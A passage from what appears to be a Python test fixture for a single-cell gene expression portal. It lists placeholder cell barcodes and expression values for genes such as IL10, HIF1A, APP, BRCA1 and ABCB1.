"FoobarAB3_BazMoo_4CAAACBDCBCBBBCA-1",
"FoobarAB2_BazMoo_3BCDCBCCBCCCCBAC-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"IL10 Expression": {
"name": "IL10 Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
2.0,
2.58,
1.0,
1.58,
1.0,
1.0,
2.81,
2.81,
2.81,
2.58,
1.0,
2.32,
1.58,
2.58,
1.58,
2.32,
2.0,
1.58,
2.58,
1.58,
3.0,
1.0,
3.0,
2.81,
2.0,
1.0,
2.58,
1.58,
2.32,
2.81,
2.0,
2.58,
1.58,
2.0,
2.81,
1.58,
2.32,
1.0,
2.58,
2.81,
2.0,
2.32,
2.58,
2.32,
2.81,
1.0,
2.81,
1.0,
2.58,
2.58,
3.0,
3.0,
2.0,
2.81,
3.0,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"HIF1A Cells": {
"name": "HIF1A Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB4_BazMoo_6ABAADADBBCAABDA-1",
"FoobarAB8_BazMoo_1BDACCDCCBBADBCB-1",
"FoobarAB5_BazMoo_4BAABBACBDADDACA-1",
"FoobarAB2_BazMoo_7DBCCABABACABBBD-1",
"FoobarAB6_BazMoo_1ABAADCDCBDDACAB-1",
"FoobarAB2_BazMoo_3DDDDDBCAAAABCBA-1",
"FoobarAB4_BazMoo_8DBCCDADBCBBCBDD-1",
"FoobarAB2_BazMoo_6ABBADACDCDDBCAC-1",
"FoobarAB3_BazMoo_1DABABDBDCCDBCBA-1",
"FoobarAB5_BazMoo_8DCCCBAABDDBDDDA-1",
"FoobarAB7_BazMoo_5DAACACCCDADACBB-1",
"FoobarAB2_BazMoo_4DDCDADBBCDBAABB-1",
"FoobarAB3_BazMoo_8CDCBBDBCDBBDBCA-1",
"FoobarAB3_BazMoo_7DCACACACDCADCBD-1",
"FoobarAB1_BazMoo_8CDCBDACDAAACBBD-1",
"FoobarAB3_BazMoo_3CBBDAAACACCDDDA-1",
"FoobarAB8_BazMoo_6BABCBBCDBBCACDD-1",
"FoobarAB8_BazMoo_8CDBBCCBBAADAAAC-1",
"FoobarAB5_BazMoo_3CBDBBABBAACABCD-1",
"FoobarAB3_BazMoo_5CAADCDABADACAAC-1",
"FoobarAB4_BazMoo_6CBCDABADDDDCBDD-1",
"FoobarAB1_BazMoo_5DDADDBCDDDCDABB-1",
"FoobarAB3_BazMoo_7BCABDBCDBABBCBA-1",
"FoobarAB8_BazMoo_8ADAABACBACDDCAB-1",
"FoobarAB6_BazMoo_4DBCDDBAAAACAADC-1",
"FoobarAB5_BazMoo_8ABDADBBCADAABDD-1",
"FoobarAB8_BazMoo_2CACAACCDBBBBBBB-1",
"FoobarAB1_BazMoo_6ABAAADABDACDDDA-1",
"FoobarAB1_BazMoo_3DBBCDAABDACBCBB-1",
"FoobarAB7_BazMoo_4DDDDDBCCCBBADBD-1",
"FoobarAB1_BazMoo_1BCCBCAADCCADCDB-1",
"FoobarAB7_BazMoo_8DACBBCACDACDCBA-1",
"FoobarAB5_BazMoo_7AAABBCDCACCABAB-1",
"FoobarAB3_BazMoo_1DBADBBCAACCBDDC-1",
"FoobarAB2_BazMoo_1CABCCCACABCCACA-1",
"FoobarAB2_BazMoo_7CDBDADBACBAAAAC-1",
"FoobarAB4_BazMoo_1BCDCDADBDBCBDAD-1",
"FoobarAB1_BazMoo_5BCAAACBABBCDBDC-1",
"FoobarAB2_BazMoo_2DABDDCDADBBDDBD-1",
"FoobarAB3_BazMoo_3BCBCBABBDBCDCAA-1",
"FoobarAB8_BazMoo_6DBAADCBDADCCDDB-1",
"FoobarAB8_BazMoo_5CBBCCCADADDADDD-1",
"FoobarAB3_BazMoo_4BBBAABCBAACCBAC-1",
"FoobarAB6_BazMoo_8DCBCBCBCDCBADBA-1",
"FoobarAB4_BazMoo_5CAADDAABBADCDCD-1",
"FoobarAB3_BazMoo_2DACDBDCAAAAACBB-1",
"FoobarAB8_BazMoo_7DADCDCBCDDBDDDA-1",
"FoobarAB7_BazMoo_2BACDBDDBCACABDD-1",
"FoobarAB1_BazMoo_4CBCCBADBAABDDBB-1",
"FoobarAB1_BazMoo_8CBDADBABACDADAC-1",
"FoobarAB5_BazMoo_3DDACADDCAADCABB-1",
"FoobarAB7_BazMoo_1CADCBBCDCBDDDDD-1",
"FoobarAB1_BazMoo_4DDDCDCCABBDDABD-1",
"FoobarAB5_BazMoo_7BAACDCDCBCBBACA-1",
"FoobarAB2_BazMoo_7DABDADBDBADACDB-1",
"FoobarAB8_BazMoo_6BDCBAACCCADDABB-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"HIF1A Expression": {
"name": "HIF1A Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
2.81,
2.81,
2.81,
2.0,
2.58,
2.32,
1.0,
2.32,
2.58,
2.58,
2.81,
3.0,
2.32,
3.0,
2.0,
2.32,
3.0,
1.58,
2.81,
2.81,
3.0,
2.58,
2.0,
3.0,
2.81,
2.32,
1.0,
1.0,
2.0,
2.58,
1.0,
3.0,
2.0,
1.0,
2.32,
2.58,
1.58,
2.81,
2.0,
2.32,
1.58,
2.58,
2.58,
1.0,
2.58,
1.0,
3.0,
1.58,
2.58,
1.0,
2.81,
2.32,
3.0,
2.58,
1.58,
1.58,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"APP Cells": {
"name": "APP Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB4_BazMoo_5ABCBACBDABBADAC-1",
"FoobarAB7_BazMoo_3ADABDACCCABBCBC-1",
"FoobarAB8_BazMoo_4BDABCDCCBABACCC-1",
"FoobarAB7_BazMoo_4DDBADDACABDABDD-1",
"FoobarAB3_BazMoo_1DABABDBDCCDBCBA-1",
"FoobarAB5_BazMoo_8DCCCBAABDDBDDDA-1",
"FoobarAB5_BazMoo_3CBBBDBACDBABBCA-1",
"FoobarAB3_BazMoo_7DCACACACDCADCBD-1",
"FoobarAB3_BazMoo_2DACADABBDACCBDC-1",
"FoobarAB1_BazMoo_3DCABADBDAADDCBD-1",
"FoobarAB1_BazMoo_8CDCBDACDAAACBBD-1",
"FoobarAB4_BazMoo_6CBCDABADDDDCBDD-1",
"FoobarAB1_BazMoo_5DDADDBCDDDCDABB-1",
"FoobarAB2_BazMoo_1DDBAACABBACBDCA-1",
"FoobarAB5_BazMoo_8ABDADBBCADAABDD-1",
"FoobarAB6_BazMoo_8CBADCCBAAABBCBA-1",
"FoobarAB6_BazMoo_7BDAABDCAADADBBA-1",
"FoobarAB6_BazMoo_4DBCDDCADAACCCDD-1",
"FoobarAB6_BazMoo_6ABCBBDBAAADCDCC-1",
"FoobarAB3_BazMoo_7DBDCDADBAAAABCD-1",
"FoobarAB4_BazMoo_4DDBADBCBACBDCDA-1",
"FoobarAB4_BazMoo_6DDACDDBBBAADBCC-1",
"FoobarAB3_BazMoo_5ACABCDCBDAAACAD-1",
"FoobarAB1_BazMoo_1DACACBDDADCCACC-1",
"FoobarAB6_BazMoo_1BCDADDDABDDBCDA-1",
"FoobarAB2_BazMoo_1CABCCCACABCCACA-1",
"FoobarAB5_BazMoo_3CDAABAABBACAAAC-1",
"FoobarAB2_BazMoo_7CDBDADBACBAAAAC-1",
"FoobarAB8_BazMoo_2CCBCCBACABACCAB-1",
"FoobarAB1_BazMoo_8CBBADABBCDAAAAA-1",
"FoobarAB8_BazMoo_5DADAAABCBADCDCC-1",
"FoobarAB3_BazMoo_2DACDBDCAAAAACBB-1",
"FoobarAB4_BazMoo_2DDCCACACDBBACCC-1",
"FoobarAB8_BazMoo_7DADCDCBCDDBDDDA-1",
"FoobarAB5_BazMoo_6ABBBBCBCBCBBCAB-1",
"FoobarAB6_BazMoo_6CACDAABBDDBCBDA-1",
"FoobarAB5_BazMoo_8BACBBADCBDDBDAA-1",
"FoobarAB2_BazMoo_5ADDADBBABBDCCAC-1",
"FoobarAB6_BazMoo_1DCACCBBDBBBBCBB-1",
"FoobarAB1_BazMoo_8CBDADBABACDADAC-1",
"FoobarAB4_BazMoo_6ADADABCCDDBDACC-1",
"FoobarAB7_BazMoo_1BBADABCABACDADC-1",
"FoobarAB5_BazMoo_6DBCBCDABBADCCCB-1",
"FoobarAB3_BazMoo_8AAABDDBDDCBDDAB-1",
"FoobarAB5_BazMoo_2DDBCCDBADBADCBC-1",
"FoobarAB4_BazMoo_1ABBDBDDDCBABACB-1",
"FoobarAB5_BazMoo_7DABADCCDABDBAAB-1",
"FoobarAB5_BazMoo_1DDDDBBDAADDABCB-1",
"FoobarAB3_BazMoo_3BBCCDBADBABBDCA-1",
"FoobarAB7_BazMoo_7BCABCCCACBAADDC-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"APP Expression": {
"name": "APP Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
1.0,
2.32,
1.0,
2.32,
2.81,
1.0,
2.0,
2.81,
3.0,
2.81,
1.0,
2.81,
1.58,
2.0,
1.58,
3.0,
1.58,
1.58,
2.81,
2.32,
2.32,
3.0,
1.58,
2.58,
2.58,
1.0,
2.81,
3.0,
1.0,
1.0,
1.0,
2.58,
2.32,
1.58,
2.58,
2.32,
3.0,
2.81,
1.58,
3.0,
1.58,
2.32,
2.32,
2.81,
2.0,
1.0,
2.32,
1.58,
3.0,
1.0,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"BRCA1 Cells": {
"name": "BRCA1 Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB4_BazMoo_6ABAADADBBCAABDA-1",
"FoobarAB8_BazMoo_1BDACCDCCBBADBCB-1",
"FoobarAB2_BazMoo_8DDACDAABBBBACDD-1",
"FoobarAB2_BazMoo_1CADBDBABCABBDDD-1",
"FoobarAB2_BazMoo_6ABBADACDCDDBCAC-1",
"FoobarAB7_BazMoo_7AADDADDDCADABDD-1",
"FoobarAB4_BazMoo_3ABCCABBCCCCBCDB-1",
"FoobarAB7_BazMoo_4ABDBBBACBCCBDAA-1",
"FoobarAB4_BazMoo_2ACAADBCBDDADADB-1",
"FoobarAB2_BazMoo_2DDCCBAACDCCADBB-1",
"FoobarAB3_BazMoo_3CBBDAAACACCDDDA-1",
"FoobarAB7_BazMoo_5CCCBCDAABDBABAD-1",
"FoobarAB5_BazMoo_3CBDBBABBAACABCD-1",
"FoobarAB8_BazMoo_5CDDADACBAAACBAA-1",
"FoobarAB7_BazMoo_6CBBDBBCBCBDABAA-1",
"FoobarAB8_BazMoo_2CACAACCDBBBBBBB-1",
"FoobarAB7_BazMoo_4DDDDDBCCCBBADBD-1",
"FoobarAB1_BazMoo_1DADCCBAAACBDABC-1",
"FoobarAB4_BazMoo_8DCDBDACADABCDDB-1",
"FoobarAB1_BazMoo_1DACACBDDADCCACC-1",
"FoobarAB6_BazMoo_1BCDADDDABDDBCDA-1",
"FoobarAB7_BazMoo_7ACADCDBAABAACBD-1",
"FoobarAB8_BazMoo_2CCBCCBACABACCAB-1",
"FoobarAB1_BazMoo_8CBBADABBCDAAAAA-1",
"FoobarAB6_BazMoo_1BDCADABBAACBCCD-1",
"FoobarAB8_BazMoo_6DBAADCBDADCCDDB-1",
"FoobarAB4_BazMoo_3BCADDCAAACBADBC-1",
"FoobarAB3_BazMoo_4CABACABDCCCADCA-1",
"FoobarAB8_BazMoo_3DACBBDDBABDDDDD-1",
"FoobarAB8_BazMoo_5DADAAABCBADCDCC-1",
"FoobarAB4_BazMoo_1DCDCCCDBDBBABBB-1",
"FoobarAB1_BazMoo_5DADBADCDDCBDAAB-1",
"FoobarAB5_BazMoo_2ACDDDDADBCDDDCA-1",
"FoobarAB7_BazMoo_2BACDBDDBCACABDD-1",
"FoobarAB2_BazMoo_5DBCDDBABCAAADDB-1",
"FoobarAB3_BazMoo_3DABBDCBDACACCCC-1",
"FoobarAB6_BazMoo_1DBBAADCDAADBCDC-1",
"FoobarAB7_BazMoo_2ACCDBBADCDCACAB-1",
"FoobarAB5_BazMoo_7BAACDCDCBCBBACA-1",
"FoobarAB7_BazMoo_5DCDDDDABACBDACA-1",
"FoobarAB4_BazMoo_5CDCCABBCBACCCBC-1",
"FoobarAB5_BazMoo_1DDDDBBDAADDABCB-1",
"FoobarAB5_BazMoo_8DDCCCBABCBACABB-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"BRCA1 Expression": {
"name": "BRCA1 Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
3.0,
1.0,
2.0,
2.81,
2.81,
2.0,
1.0,
2.0,
2.32,
2.0,
1.0,
1.58,
2.0,
1.58,
1.58,
2.0,
1.58,
3.0,
2.0,
1.58,
2.58,
3.0,
2.81,
2.81,
1.58,
2.58,
3.0,
2.81,
2.0,
1.58,
2.0,
2.0,
2.58,
3.0,
2.0,
2.81,
2.0,
2.32,
1.58,
2.81,
2.32,
2.58,
1.58,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"MMP9 Cells": {
"name": "MMP9 Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB8_BazMoo_7ADDDBCAAAADBCAB-1",
"FoobarAB2_BazMoo_3BBCBAABCDAACADD-1",
"FoobarAB2_BazMoo_8BDBABBACDCCDDBD-1",
"FoobarAB3_BazMoo_1DABABDBDCCDBCBA-1",
"FoobarAB6_BazMoo_7CBBCDBADBBBABDA-1",
"FoobarAB5_BazMoo_3CBBBDBACDBABBCA-1",
"FoobarAB2_BazMoo_1AADDCCADACBADAD-1",
"FoobarAB7_BazMoo_5BADDCDBCDDBCDAA-1",
"FoobarAB4_BazMoo_6CADCBCCBCDACDBD-1",
"FoobarAB3_BazMoo_8CDCBBDBCDBBDBCA-1",
"FoobarAB3_BazMoo_7DCACACACDCADCBD-1",
"FoobarAB2_BazMoo_2DDCCBAACDCCADBB-1",
"FoobarAB3_BazMoo_3CBBDAAACACCDDDA-1",
"FoobarAB7_BazMoo_3ACBCBCACACDBADD-1",
"FoobarAB5_BazMoo_3BDBBDDDDDBBABAC-1",
"FoobarAB3_BazMoo_7BCABDBCDBABBCBA-1",
"FoobarAB8_BazMoo_8ADAABACBACDDCAB-1",
"FoobarAB3_BazMoo_5DAAABCBCADBBCCC-1",
"FoobarAB4_BazMoo_4DDBADBCBACBDCDA-1",
"FoobarAB7_BazMoo_4DDDDDBCCCBBADBD-1",
"FoobarAB3_BazMoo_1DBABCBBAABBABBB-1",
"FoobarAB2_BazMoo_1DDDBDCCBCBCACAA-1",
"FoobarAB4_BazMoo_6DDACDDBBBAADBCC-1",
"FoobarAB5_BazMoo_3BADAABBDABABDAC-1",
"FoobarAB1_BazMoo_1DACACBDDADCCACC-1",
"FoobarAB7_BazMoo_8DCBCBBACADBBBAC-1",
"FoobarAB5_BazMoo_3CDAABAABBACAAAC-1",
"FoobarAB4_BazMoo_1BCDCDADBDBCBDAD-1",
"FoobarAB2_BazMoo_1ACCDADBABBACBCA-1",
"FoobarAB1_BazMoo_5BCAAACBABBCDBDC-1",
"FoobarAB3_BazMoo_8BCDBDDBDBDBDCBC-1",
"FoobarAB5_BazMoo_1DCBBBBDACADABAA-1",
"FoobarAB2_BazMoo_8CCACCBDCBCDABAD-1",
"FoobarAB1_BazMoo_3BBCCABDADCDBCCB-1",
"FoobarAB4_BazMoo_7DDBDCACBACDBAAC-1",
"FoobarAB3_BazMoo_6BACBCBCDAADDDAC-1",
"FoobarAB7_BazMoo_5DAADBACDAADAABB-1",
"FoobarAB3_BazMoo_4CACCAABBDCDBACD-1",
"FoobarAB5_BazMoo_8CCBBABDDADBBACD-1",
"FoobarAB4_BazMoo_5CAADDAABBADCDCD-1",
"FoobarAB3_BazMoo_2DACDBDCAAAAACBB-1",
"FoobarAB7_BazMoo_2BACDBDDBCACABDD-1",
"FoobarAB8_BazMoo_1CBBCDBACADDAABB-1",
"FoobarAB1_BazMoo_5AABDACBCCBCABDD-1",
"FoobarAB4_BazMoo_2CCACBADCCCCABAD-1",
"FoobarAB1_BazMoo_8DDCCAABADABCACC-1",
"FoobarAB1_BazMoo_4DDDCDCCABBDDABD-1",
"FoobarAB5_BazMoo_7BAACDCDCBCBBACA-1",
"FoobarAB5_BazMoo_7DABADCCDABDBAAB-1",
"FoobarAB5_BazMoo_1DDDDBBDAADDABCB-1",
"FoobarAB8_BazMoo_5CBCADBCADABBCAB-1",
"FoobarAB6_BazMoo_4DAACBADBACABADC-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"MMP9 Expression": {
"name": "MMP9 Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
3.0,
1.0,
1.58,
2.32,
1.58,
3.0,
2.81,
1.58,
2.32,
2.0,
2.0,
1.58,
1.0,
2.32,
2.0,
2.81,
2.58,
1.58,
1.0,
3.0,
1.0,
2.81,
2.58,
2.58,
2.81,
2.0,
2.32,
1.0,
2.81,
1.0,
1.58,
2.58,
1.58,
1.0,
1.0,
2.32,
2.32,
3.0,
1.58,
1.58,
2.0,
2.81,
3.0,
1.58,
3.0,
2.0,
2.32,
2.58,
2.32,
2.0,
2.81,
3.0,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"HLA-DRB1 Cells": {
"name": "HLA-DRB1 Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB4_BazMoo_6ABAADADBBCAABDA-1",
"FoobarAB5_BazMoo_4BAABBACBDADDACA-1",
"FoobarAB5_BazMoo_7DCACDAACCACBBBD-1",
"FoobarAB8_BazMoo_4BDABCDCCBABACCC-1",
"FoobarAB2_BazMoo_8BDBABBACDCCDDBD-1",
"FoobarAB8_BazMoo_4CDBCDACADDDCABA-1",
"FoobarAB4_BazMoo_2ACAADBCBDDADADB-1",
"FoobarAB3_BazMoo_8CDCBBDBCDBBDBCA-1",
"FoobarAB2_BazMoo_8DDABDBCDABBBDAA-1",
"FoobarAB7_BazMoo_5CBDCCDBCDBCDCCC-1",
"FoobarAB3_BazMoo_5CAADCDABADACAAC-1",
"FoobarAB4_BazMoo_2BBDBCACBADBDDBA-1",
"FoobarAB8_BazMoo_6CADDCBBACDDBACB-1",
"FoobarAB1_BazMoo_3BCBBBCBCDDCBDAB-1",
"FoobarAB3_BazMoo_7BCABDBCDBABBCBA-1",
"FoobarAB8_BazMoo_7DDBCBACABDABBAA-1",
"FoobarAB6_BazMoo_4DBCDDBAAAACAADC-1",
"FoobarAB5_BazMoo_5BBDADCDDCCABBDA-1",
"FoobarAB8_BazMoo_4BDDDDBCBCAABDDD-1",
"FoobarAB7_BazMoo_4DDDDDBCCCBBADBD-1",
"FoobarAB3_BazMoo_1DBABCBBAABBABBB-1",
"FoobarAB3_BazMoo_5ACABCDCBDAAACAD-1",
"FoobarAB1_BazMoo_6BADACADACADCDDD-1",
"FoobarAB8_BazMoo_6BCCBDBADAABDCCD-1",
"FoobarAB6_BazMoo_2CCACBBAAACCAACA-1",
"FoobarAB7_BazMoo_2BCBBBBCBCAAABDD-1",
"FoobarAB3_BazMoo_4CACCAABBDCDBACD-1",
"FoobarAB8_BazMoo_6DBAADCBDADCCDDB-1",
"FoobarAB7_BazMoo_5DBABDCBDCBADBCA-1",
"FoobarAB8_BazMoo_2CCBABBDDADCCDBD-1",
"FoobarAB3_BazMoo_2DACDBDCAAAAACBB-1",
"FoobarAB4_BazMoo_2DDCCACACDBBACCC-1",
"FoobarAB5_BazMoo_6ABBBBCBCBCBBCAB-1",
"FoobarAB3_BazMoo_2ADDBAAACCDDDDAA-1",
"FoobarAB4_BazMoo_6ADADABCCDDBDACC-1",
"FoobarAB8_BazMoo_4BCABBACDAACCBCA-1",
"FoobarAB3_BazMoo_6DDAABBCDBABACAA-1",
"FoobarAB8_BazMoo_2CADDACABACDAADD-1",
"FoobarAB1_BazMoo_4DDDCDCCABBDDABD-1",
"FoobarAB5_BazMoo_2DDBCCDBADBADCBC-1",
"FoobarAB4_BazMoo_1ABBDBDDDCBABACB-1",
"FoobarAB6_BazMoo_4DAACBADBACABADC-1",
"FoobarAB3_BazMoo_8BDCBCBDCABACCCB-1",
"FoobarAB7_BazMoo_7BCABCCCACBAADDC-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"HLA-DRB1 Expression": {
"name": "HLA-DRB1 Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
1.0,
2.32,
2.32,
2.58,
2.0,
1.0,
2.58,
1.58,
2.0,
1.58,
2.58,
2.58,
1.0,
2.81,
1.0,
1.0,
2.81,
2.32,
2.0,
2.32,
1.0,
2.81,
2.58,
1.58,
1.58,
2.32,
1.0,
2.81,
2.0,
2.32,
2.32,
1.58,
2.81,
2.58,
1.0,
2.32,
2.58,
2.58,
1.58,
2.58,
2.81,
1.58,
2.0,
2.32,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"ADIPOQ Cells": {
"name": "ADIPOQ Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB4_BazMoo_5ABCBACBDABBADAC-1",
"FoobarAB4_BazMoo_2DABDACBCCCCADBC-1",
"FoobarAB5_BazMoo_5BBDADACAABADAAB-1",
"FoobarAB8_BazMoo_7ADDDBCAAAADBCAB-1",
"FoobarAB5_BazMoo_7DCACDAACCACBBBD-1",
"FoobarAB6_BazMoo_4CBDCBCDACADDDDA-1",
"FoobarAB3_BazMoo_8ADDBCBACDCCACCD-1",
"FoobarAB2_BazMoo_3DDDDDBCAAAABCBA-1",
"FoobarAB8_BazMoo_4CDBCDACADDDCABA-1",
"FoobarAB7_BazMoo_2CADCDBBDBBDDCBA-1",
"FoobarAB7_BazMoo_4ABDBBBACBCCBDAA-1",
"FoobarAB3_BazMoo_8CDCBBDBCDBBDBCA-1",
"FoobarAB8_BazMoo_8CDBBCCBBAADAAAC-1",
"FoobarAB1_BazMoo_8DCCDCBDADCCAACD-1",
"FoobarAB4_BazMoo_6CBCDABADDDDCBDD-1",
"FoobarAB8_BazMoo_1CBADADCCCCACAAC-1",
"FoobarAB3_BazMoo_7BCABDBCDBABBCBA-1",
"FoobarAB8_BazMoo_7DDBCBACABDABBAA-1",
"FoobarAB3_BazMoo_5DAAABCBCADBBCCC-1",
"FoobarAB4_BazMoo_1ABABBCCADCADBAB-1",
"FoobarAB5_BazMoo_5BBDADCDDCCABBDA-1",
"FoobarAB3_BazMoo_1DBABCBBAABBABBB-1",
"FoobarAB4_BazMoo_6DDACDDBBBAADBCC-1",
"FoobarAB1_BazMoo_6BADACADACADCDDD-1",
"FoobarAB2_BazMoo_8DBCDDCCAACDDDCB-1",
"FoobarAB8_BazMoo_2CCBCCBACABACCAB-1",
"FoobarAB6_BazMoo_2CCACBBAAACCAACA-1",
"FoobarAB6_BazMoo_6DCADBCABDDCCAAA-1",
"FoobarAB1_BazMoo_3BDCBBDBACBABCCB-1",
"FoobarAB3_BazMoo_6BACBCBCDAADDDAC-1",
"FoobarAB3_BazMoo_4CACCAABBDCDBACD-1",
"FoobarAB3_BazMoo_4BBBAABCBAACCBAC-1",
"FoobarAB6_BazMoo_8DCBCBCBCDCBADBA-1",
"FoobarAB1_BazMoo_5DADBADCDDCBDAAB-1",
"FoobarAB5_BazMoo_6ABBBBCBCBCBBCAB-1",
"FoobarAB6_BazMoo_1DCACCBBDBBBBCBB-1",
"FoobarAB2_BazMoo_5DCCBDBABBDACAAB-1",
"FoobarAB2_BazMoo_1CABADDBCABBCBBA-1",
"FoobarAB8_BazMoo_7DCADDBDCBABCBCA-1",
"FoobarAB2_BazMoo_7DABDADBDBADACDB-1",
"FoobarAB5_BazMoo_2DDBCCDBADBADCBC-1",
"FoobarAB4_BazMoo_1ABBDBDDDCBABACB-1",
"FoobarAB5_BazMoo_7DABADCCDABDBAAB-1",
"FoobarAB7_BazMoo_3DDCCDCCDDBBAADB-1",
"FoobarAB5_BazMoo_8DDCCCBABCBACABB-1",
"FoobarAB7_BazMoo_7BCABCCCACBAADDC-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"ADIPOQ Expression": {
"name": "ADIPOQ Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
2.0,
2.0,
2.32,
2.58,
2.0,
2.81,
2.58,
2.0,
2.81,
2.58,
1.0,
2.32,
2.0,
2.58,
2.58,
2.0,
3.0,
3.0,
1.58,
1.58,
1.0,
1.58,
1.0,
2.0,
1.58,
3.0,
2.0,
2.81,
2.81,
1.58,
2.0,
2.0,
1.58,
2.81,
2.58,
2.0,
2.58,
3.0,
2.32,
1.0,
1.0,
1.58,
3.0,
2.32,
3.0,
2.0,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"ABCB1 Cells": {
"name": "ABCB1 Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB4_BazMoo_2DABDACBCCCCADBC-1",
"FoobarAB5_BazMoo_4BAABBACBDADDACA-1",
"FoobarAB5_BazMoo_7DCACDAACCACBBBD-1",
"FoobarAB1_BazMoo_1BBDDDBDADDCACAB-1",
"FoobarAB6_BazMoo_4CBDCBCDACADDDDA-1",
"FoobarAB2_BazMoo_1CADBDBABCABBDDD-1",
"FoobarAB2_BazMoo_3DDDDDBCAAAABCBA-1",
"FoobarAB4_BazMoo_8DBCCDADBCBBCBDD-1",
"FoobarAB6_BazMoo_3BADDCCDACDAAAAD-1",
"FoobarAB6_BazMoo_2DDDCABCCCDBDDAC-1",
"FoobarAB7_BazMoo_5BADDCDBCDDBCDAA-1",
"FoobarAB3_BazMoo_3CBBDAAACACCDDDA-1",
"FoobarAB5_BazMoo_3CBDBBABBAACABCD-1",
"FoobarAB2_BazMoo_8DDABDBCDABBBDAA-1",
"FoobarAB2_BazMoo_2DCDCDBCBABDBBAD-1",
"FoobarAB4_BazMoo_3BBADCDAABADCAAB-1",
"FoobarAB8_BazMoo_5CDDADACBAAACBAA-1",
"FoobarAB4_BazMoo_2BBDBCACBADBDDBA-1",
"FoobarAB8_BazMoo_1CBADADCCCCACAAC-1",
"FoobarAB6_BazMoo_4DBCDDBAAAACAADC-1",
"FoobarAB5_BazMoo_5BBDADCDDCCABBDA-1",
"FoobarAB8_BazMoo_4BDDDDBCBCAABDDD-1",
"FoobarAB2_BazMoo_4ACDCCACDDBADADC-1",
"FoobarAB3_BazMoo_2CDDDCADDBDBDABB-1",
"FoobarAB3_BazMoo_8BCDBDDBDBDBDCBC-1",
"FoobarAB1_BazMoo_7BDCABCBDAADCBBA-1",
"FoobarAB4_BazMoo_6ABCCABADCCDBCAA-1",
"FoobarAB7_BazMoo_5DAADBACDAADAABB-1",
"FoobarAB6_BazMoo_1BDCADABBAACBCCD-1",
"FoobarAB5_BazMoo_8CCBBABDDADBBACD-1",
"FoobarAB8_BazMoo_5DADAAABCBADCDCC-1",
"FoobarAB5_BazMoo_2ACDDDDADBCDDDCA-1",
"FoobarAB7_BazMoo_2BACDBDDBCACABDD-1",
"FoobarAB2_BazMoo_5DCCBDBABBDACAAB-1",
"FoobarAB4_BazMoo_2CCACBADCCCCABAD-1",
"FoobarAB6_BazMoo_1DBBAADCDAADBCDC-1",
